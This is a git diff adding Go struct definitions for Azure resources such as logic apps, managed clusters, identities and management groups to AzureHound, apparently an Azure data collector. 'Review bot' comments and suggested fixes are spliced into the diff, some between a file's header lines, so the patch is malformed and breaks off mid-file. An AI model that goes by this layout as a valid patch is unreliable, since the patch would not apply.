diff --git a/models/azure/locale_info.go b/models/azure/locale_info.go
new file mode 100644
index 0000000..859e680
--- /dev/null
+++ b/models/azure/locale_info.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type LocaleInfo struct {
+ // A locale code for the user, which includes the user's perferred language and country/region as defined
+ // in ISO 639-1 and ISO 3166-1 alpha-2. E.g. "en-us"
+ Locale string `json:"locale,omitempty"`
+
+ // A name representing the user's locale in natural language. E.g. "English (United States)"
+ DisplayName string `json:"displayName,omitempty"`
+}
diff --git a/models/azure/logic_app.go b/models/azure/logic_app.go
new file mode 100644
index 0000000..67d8527
--- /dev/null
+++ b/models/azure/logic_app.go
@@ -0,0 +1,49 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type LogicApp struct {
+ Entity
+
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Properties LogicAppProperties `json:"properties,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+func (s LogicApp) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s LogicApp) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/logic_app_definition.go b/models/azure/logic_app_definition.go
new file mode 100644
index 0000000..2cff0bb
--- /dev/null
+++ b/models/azure/logic_app_definition.go
@@ -0,0 +1,90 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type Definition struct {
+ Schema string `json:"$schema,omitempty"`
+ // Certain actions can be nested, have different elements based on the name(key) of given action - Condition is an example
+ // Actions map[string]Action `json:"actions,omitempty"`
+ Actions map[string]interface{} `json:"actions,omitempty"`
+ ContentVersion string `json:"contentVersion,omitempty"`
+ Outputs map[string]Output `json:"outputs,omitempty"`
+ Parameters map[string]Parameter `json:"parameters,omitempty"`
+ StaticResults map[string]StaticResult `json:"staticResults,omitempty"`
+ Triggers map[string]Trigger `json:"triggers,omitempty"`
+}
+
+type Action struct {
+ Type string `json:"type"`
+ // Kind is missing in the MSDN, but returned and present in examples and during testing
+ Kind string `json:"kind,omitempty"`
+ Inputs map[string]interface{} `json:"inputs,omitempty"`
+ RunAfter interface{} `json:"runAfter,omitempty"`
+ RuntimeConfiguration interface{} `json:"runtimeConfiguration,omitempty"`
+ OperationOptions string `json:"operationOptions,omitempty"`
+}
+
+type Output struct {
+ Type string `json:"type,omitempty"`
+ // Type of this is based on above Type
+ Value interface{} `json:"value,omitempty"`
+}
+
+type Parameter struct {
+ Type string `json:"type,omitempty"`
+ DefaultValue interface{} `json:"defaultValue,omitempty"`
+ AllowedValues []interface{} `json:"allowedValues,omitempty"`
+ Metadata Metadata `json:"metadata,omitempty"`
+}
+
+type Metadata struct {
+ Description interface{} `json:"description,omitempty"`
+}
+
+type StaticResult struct {
+ Outputs ResultOutput `json:"outputs,omitempty"`
+ Status string `json:"status,omitempty"`
+}
+
+type ResultOutput struct {
+ Headers map[string]string `json:"headers,omitempty"`
+ StatusCode string `json:"statusCode,omitempty"`
+}
+
+type Trigger struct {
+ Type string `json:"type,omitempty"`
+ // Kind is missing in the MSDN, but returned and present in examples and during testing
+ Kind string `json:"kind,omitempty"`
+ // Inputs is a custom element based on the type of trigger
+ Inputs interface{} `json:"inputs,omitempty"`
+ Recurrence Recurrence `json:"recurrence,omitempty"`
+ Conditions []Condition `json:"conditions,omitempty"`
+ // Runtime configuration is a custom element based on the type of trigger
+ RuntimeConfiguration interface{} `json:"runtimeConfiguration,omitempty"`
+ SplitOn string `json:"splitOn,omitempty"`
+ OperationOptions string `json:"operationOptions,omitempty"`
+}
+
+type Recurrence struct {
+ Frequency string `json:"frequency,omitempty"`
+ Interval int `json:"interval,omitempty"`
+}
+
+type Condition struct {
+ Expression string `json:"expression,omitempty"`
+}
diff --git a/models/azure/logic_app_parameter.go b/models/azure/logic_app_parameter.go
new file mode 100644
index 0000000..8cfc424
--- /dev/null
+++ b/models/azure/logic_app_parameter.go
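Review bot: `Definition` keeps a commented-out field (`// Actions map[string]Action ...`) directly above the live `Actions map[string]interface{}`, which leaves the `Action` type declared but, as far as this hunk shows, unused. Delete the dead line and state in a comment why actions stay untyped, or remove `Action`. None of the exported types in this file has a doc comment, and names such as `Parameter`, `Output`, `Metadata` and `Condition` are very generic for a package that models many Azure resources; a `LogicApp` prefix would match `LogicAppParameter` in logic_app_parameter.go. Workflow definitions may carry connection strings or tokens in action inputs and parameter defaults, so I would add to `Definition`'s doc comment that the decoded value should be handled and stored as sensitive data.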
@@ -0,0 +1,55 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+type LogicAppParameter struct {
+ Description string `json:"description,omitempty"`
+ //Metadata - marked as object in MSDN, however no other description available - in testing was not able to return a value here
+ Metadata interface{} `json:"metadata,omitempty"`
+ Type enums.ParameterType `json:"type,omitempty"`
+ Value interface{} `json:"value,omitempty"`
+}
+
+func (s LogicAppParameter) GetValue() interface{} {
+ switch s.Type {
+ case enums.ArrayType:
+ return s.Value.([]interface{})
+ case enums.BoolType:
+ return s.Value.(bool)
+ case enums.FloatType:
+ return s.Value.(float64)
+ case enums.IntType:
+ return s.Value.(int)
+ case enums.NotSpecifiedType:
+ return s.Value
+ case enums.ObjectType:
+ return s.Value
+ case enums.SecureObjectType:
+ return s.Value
+ case enums.SecureStringType:
+ return s.Value
+ case enums.StringType:
+ return s.Value.(string)
+ default:
+ return s.Value
+ }
+}
diff --git a/models/azure/logic_app_properties.go b/models/azure/logic_app_properties.go
new file mode 100644
index 0000000..af0dfec
--- /dev/null
+++ b/models/azure/logic_app_properties.go
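Review bot: `GetValue` uses unchecked type assertions, so a parameter whose `value` does not match its declared `type` panics the collector instead of being reported, and both fields come from tenant-controlled workflow content. The `enums.IntType` branch is worse: encoding/json stores a JSON number decoded into an `interface{}` as `float64` (or `json.Number`), never `int`, so `s.Value.(int)` panics on any integer parameter that was unmarshalled from a response. The other assertions do not change the result, because the value is returned as `interface{}` again, so they can be dropped and only the integer case needs a checked conversion. Whether anything calls `GetValue` is not visible in this hunk.

```go
func (s LogicAppParameter) GetValue() interface{} {
	// encoding/json decodes a JSON number held in an interface{} as float64.
	if s.Type == enums.IntType {
		if f, ok := s.Value.(float64); ok {
			return int(f)
		}
	}
	// Every other branch returned the decoded value unchanged, so return it
	// as-is instead of asserting a type the payload may not have.
	return s.Value
}
```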
@@ -0,0 +1,51 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type LogicAppProperties struct {
+ AccessEndpoint string `json:"accessEndpoint,omitempty"`
+ ChangedTime string `json:"changedTime,omitempty"`
+ CreatedTime string `json:"createdTime,omitempty"`
+ Definition Definition `json:"definition,omitempty"`
+ IntegrationAccount ResourceReference `json:"integrationAccount,omitempty"`
+ // Note: in testing this does not get populated, instead the parameters are listed within the definition
+ Parameters map[string]LogicAppParameter `json:"parameters,omitempty"`
+ ProvisioningState enums.LogicAppProvisioningState `json:"provisioningState,omitempty"`
+ Sku LogicAppSku `json:"sku,omitempty"`
+ State enums.LogicAppState `json:"state,omitempty"`
+ Version string `json:"version,omitempty"`
+
+ // This does not appear in the documentation, however, it gets populated in the response
+ EndpointConfiguration EndpointConfiguration `json:"endpointsConfiguration,omitempty"`
+}
+
+type EndpointConfiguration struct {
+ LogicApp LogicAppEndpointConfiguration `json:"logicapp,omitempty"`
+ Connector LogicAppEndpointConfiguration `json:"connector,omitempty"`
+}
+
+type LogicAppEndpointConfiguration struct {
+ OutgoingIpAddresses []AddressEndpointConfiguration `json:"outgoingIpAddresses,omitempty"`
+ AccessEndpointIpAddresses []AddressEndpointConfiguration `json:"accessEndpointIpAddresses,omitempty"`
+}
+
+type AddressEndpointConfiguration struct {
+ Address string `json:"address,omitempty"`
+}
diff --git a/models/azure/logic_app_sku.go b/models/azure/logic_app_sku.go
new file mode 100644
index 0000000..d492197
--- /dev/null
+++ b/models/azure/logic_app_sku.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type LogicAppSku struct {
+ Name enums.SkuName `json:"name,omitempty"`
+ Plan ResourceReference `json:"plan,omitempty"`
+}
diff --git a/models/azure/mailbox_settings.go b/models/azure/mailbox_settings.go
new file mode 100644
index 0000000..e395786
--- /dev/null
+++ b/models/azure/mailbox_settings.go
@@ -0,0 +1,48 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type MailboxSettings struct {
+ // Folder ID of an archive folder for the user.
+ ArchiveFolder string `json:"archiveFolder,omitempty"`
+
+ // Configuration settings to automatically notify the sender of an incoming email with a message from the signed-in
+ // user.
+ AutomaticRepliesSetting AutomaticRepliesSetting `json:"automaticRepliesSetting,omitempty"`
+
+ // The date format for the user's mailbox.
+ DateFormat string `json:"dateFormat,omitempty"`
+
+ // If the user has a calendar delegate, this specifies whether the delegate, mailbox owner, or both receive meeting
+ // messages and meeting responses.
+ DelegateMeetingMessageDeliveryOptions enums.MessageDeliveryOptions `json:"delegateMeetingMessageDeliveryOptions,omitempty"`
+
+ // The locale information for the user, including the preferred language and country/region.
+ Language LocaleInfo `json:"language,omitempty"`
+
+ // The time format for the user's mailbox.
+ TimeFormat string `json:"timeFormat,omitempty"`
+
+ // The default time zone for the user's mailbox.
+ TimeZone string `json:"timeZone,omitempty"`
+
+ // The days of the week and hours in a specific time zone that the user works.
+ WorkingHours WorkingHours `json:"workingHours,omitempty"`
+}
diff --git a/models/azure/maintenance_redeploy_status.go b/models/azure/maintenance_redeploy_status.go
new file mode 100644
index 0000000..2932bf4
--- /dev/null
+++ b/models/azure/maintenance_redeploy_status.go
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// Maintenance operations status.
+type MaintenanceRedeployStatus struct {
+ // True if customer is allowed to perform maintenance.
+ IsCustomerInitiatedMaintenanceAllowed bool `json:"isCustomerInitiatedMaintenanceAllowed,omitempty"`
+
+ // Message returned for the last maintenance operation.
+ LastOperationMessage string `json:"lastOperationMessage,omitempty"`
+
+ // The last maintenance operation result code.
+ LastOperationResultCode enums.MaintenanceOperationCode `json:"lastOperationResultCode,omitempty"`
+
+ // End time for the maintenance window.
+ MaintenanceWindowEndTime string `json:"maintenanceWindowEndTime,omitempty"`
+
+ // Start time for the maintenance window.
+ MaintenanceWindowStartTime string `json:"maintenanceWindowStartTime,omitempty"`
+
+ // End time for the pre maintenance window.
+ PreMaintenanceWindowEndTime string `json:"preMaintenanceWindowEndTime,omitempty"`
+
+ // Start time for the pre maintenance window.
+ PreMaintenanceWindowStartTime string `json:"preMaintenanceWindowStartTime,omitempty"`
+}
diff --git a/models/azure/managed_by_tenant.go b/models/azure/managed_by_tenant.go
new file mode 100644
index 0000000..50b2087
--- /dev/null
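Review bot: `IsCustomerInitiatedMaintenanceAllowed` is a plain `bool` tagged `omitempty`, so a genuine `false` is dropped when the struct is marshalled and cannot be told apart from a field the API never returned. Either remove the option, `json:"isCustomerInitiatedMaintenanceAllowed"`, or use `*bool` if the absent case has to stay distinct. `Primary` in network_interface_reference_props.go and `Essential` in optional_claims.go have the same shape.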
+++ b/models/azure/managed_by_tenant.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Information about a tenant managing the subscription.
+type ManagedByTenant struct {
+ // The tenant ID of the managing tenant.
+ TenantId uuid.UUID `json:"tenantId,omitempty"`
+}
diff --git a/models/azure/managed_cluster.go b/models/azure/managed_cluster.go
new file mode 100644
index 0000000..e0aa74c
--- /dev/null
+++ b/models/azure/managed_cluster.go
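Review bot: `TenantId uuid.UUID` is an array type, so `omitempty` never fires and an unset tenant is marshalled as the all-zero UUID, which reads like a real identifier in the collected output. It is also the only tenant id in this part of the patch that is parsed at decode time: `ManagedIdentity.TenantId` and `ManagementGroupProperties.TenantId` are plain strings, and a response carrying an empty or malformed `tenantId` would presumably fail the whole unmarshal here. Consider `TenantId string` for consistency, or `*uuid.UUID` if the typed value is wanted.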
@@ -0,0 +1,52 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type ManagedCluster struct {
+ Entity
+
+ ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"`
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Properties ManagedClusterProperties `json:"properties,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Plan Plan `json:"plan,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+ Zones []string `json:"zones,omitempty"`
+}
+
+func (s ManagedCluster) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s ManagedCluster) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/managed_cluster_properties.go b/models/azure/managed_cluster_properties.go
new file mode 100644
index 0000000..59d5bf7
--- /dev/null
+++ b/models/azure/managed_cluster_properties.go
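Review bot: `ResourceGroupName` and `ResourceGroupId` take `parts[4]` and `parts[:5]` of `s.Id` by position only, without checking that the fourth segment is `resourceGroups`, so an id of any other shape with enough segments yields a wrong resource group instead of an empty string. The two guards also disagree (`len(parts) > 4` against `len(parts) > 5`) although both read only the first five segments, and the `else` after a `return` is redundant. Since the result ties collected objects to their resource group, I would validate the segment case-insensitively and share the bound, as below.

```go
func (s ManagedCluster) ResourceGroupName() string {
	parts := strings.Split(s.Id, "/")
	if len(parts) > 4 && strings.EqualFold(parts[3], "resourceGroups") {
		return parts[4]
	}
	return ""
}

func (s ManagedCluster) ResourceGroupId() string {
	parts := strings.Split(s.Id, "/")
	if len(parts) > 4 && strings.EqualFold(parts[3], "resourceGroups") {
		return strings.Join(parts[:5], "/")
	}
	return ""
}
```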
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Properties of the vault
+type ManagedClusterProperties struct {
+ // The name of the AzureRM Resource Group the Managed Cluster's Virtual Machine Scale Set resides
+ NodeResourceGroup string `json:"nodeResourceGroup,omitempty"`
+}
diff --git a/models/azure/managed_disk_params.go b/models/azure/managed_disk_params.go
new file mode 100644
index 0000000..f48da6f
--- /dev/null
+++ b/models/azure/managed_disk_params.go
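Review bot: The doc comment on `ManagedClusterProperties` reads `// Properties of the vault`, which looks copied from a key vault model and does not describe this type. Suggested: `// ManagedClusterProperties holds the managed cluster properties that are collected.` The field comment is also missing its preposition: `// The name of the AzureRM Resource Group the Managed Cluster's Virtual Machine Scale Set resides in`.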
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// The parameters of a managed disk.
+type ManagedDiskParameters struct {
+ // Specifies the customer managed disk encryption set resource id for the managed disk.
+ DiskEncryptionSet DiskEncryptionSetParameters `json:"diskEncryptionSet,omitempty"`
+
+ // Resource ID.
+ Id string `json:"id,omitempty"`
+
+ // Specifies the storage account type for the managed disk. NOTE: UltraSSD_LRS can only be used with data disks,
+ // it cannot be used with OS Disk.
+ StorageAccountType enums.StorageType `json:"storageAccountType,omitempty"`
+}
diff --git a/models/azure/managed_identity.go b/models/azure/managed_identity.go
new file mode 100644
index 0000000..ff0f946
--- /dev/null
+++ b/models/azure/managed_identity.go
@@ -0,0 +1,42 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// Deprecated, use ManagedIdentity
+type VirtualMachineIdentity ManagedIdentity
+
+// Managed identity.
+type ManagedIdentity struct {
+ // The principal id of the managed identity. The property will only be provided for a system assigned
+ // identity.
+ PrincipalId string `json:"principalId,omitempty"`
+
+ // The tenant id associated with the managed identity. This property will only be provided for a system assigned
+ // identity.
+ TenantId string `json:"tenantId,omitempty"`
+
+ // The type of identity used.
+ Type enums.Identity `json:"type,omitempty"`
+
+ // The list of user identities associated with the Managed identity. The user identity dictionary key references will be
+ // ARM resource ids in the form:
+ // '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'
+ UserAssignedIdentities map[string]UserAssignedIdentity `json:"userAssignedIdentities,omitempty"`
+}
diff --git a/models/azure/management_group.go b/models/azure/management_group.go
new file mode 100644
index 0000000..761c7f5
--- /dev/null
+++ b/models/azure/management_group.go
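Review bot: `// Deprecated, use ManagedIdentity` on `VirtualMachineIdentity` is not in the form Go tooling recognises, so gopls and staticcheck will not flag remaining uses of the old type. Write it as a doc comment that ends in its own paragraph `// Deprecated: use ManagedIdentity instead.`, preceded by a first line such as `// VirtualMachineIdentity is the former name of ManagedIdentity.` It would also help to state on `ManagedIdentity` that `PrincipalId` is empty for a resource that carries only user-assigned identities, so callers working out which principals a resource can act as must read `UserAssignedIdentities` as well; that follows from the field comments but is easy to miss.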
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ManagementGroup struct {
+ Entity
+
+ // The name of the management group. E.g. 00000000-0000-0000-0000-000000000000
+ Name string `json:"name,omitempty"`
+
+ // The properties of the management group.
+ Properties ManagementGroupProperties `json:"properties,omitempty"`
+
+ // The type of resource: "Microsoft.Management/managementGroups"
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/management_group_child_info.go b/models/azure/management_group_child_info.go
new file mode 100644
index 0000000..4fab42b
--- /dev/null
+++ b/models/azure/management_group_child_info.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The child information of a management group.
+type ManagementGroupChildInfo struct {
+ Children []ManagementGroupChildInfo `json:"children,omitempty"`
+ DisplayName string `json:"displayName,omitempty"`
+ Id string `json:"id,omitempty"`
+ Name string `json:"name,omitempty"`
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/management_group_details.go b/models/azure/management_group_details.go
new file mode 100644
index 0000000..a2f78cd
--- /dev/null
+++ b/models/azure/management_group_details.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ManagementGroupDetails struct {
+ Parent ParentGroupInfo `json:"parent,omitempty"`
+ Path []ManagementGroupPathElement `json:"path,omitempty"`
+ UpdatedBy string `json:"updatedBy,omitempty"`
+ UpdatedTime string `json:"updatedTime,omitempty"`
+ Version int `json:"version,omitempty"`
+}
diff --git a/models/azure/management_group_path_elem.go b/models/azure/management_group_path_elem.go
new file mode 100644
index 0000000..95e53a5
--- /dev/null
+++ b/models/azure/management_group_path_elem.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ManagementGroupPathElement struct {
+ DisplayName string `json:"displayName,omitempty"`
+ Name string `json:"name,omitempty"`
+}
diff --git a/models/azure/management_group_props.go b/models/azure/management_group_props.go
new file mode 100644
index 0000000..4754107
--- /dev/null
+++ b/models/azure/management_group_props.go
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The properties of the management group.
+type ManagementGroupProperties struct {
+ // The list of children.
+ Children []ManagementGroupChildInfo `json:"children,omitempty"`
+
+ // The details of the management group.
+ Details ManagementGroupDetails `json:"details,omitempty"`
+
+ // The friendly name of the management group.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // The Azure AD Tenant ID associated with the management group. E.g. 00000000-0000-0000-0000-000000000000
+ TenantId string `json:"tenantId,omitempty"`
+}
diff --git a/models/azure/name_value_pair.go b/models/azure/name_value_pair.go
new file mode 100644
index 0000000..da041a3
--- /dev/null
+++ b/models/azure/name_value_pair.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type NameValuePair struct {
+ Name string `json:"name,omitempty"`
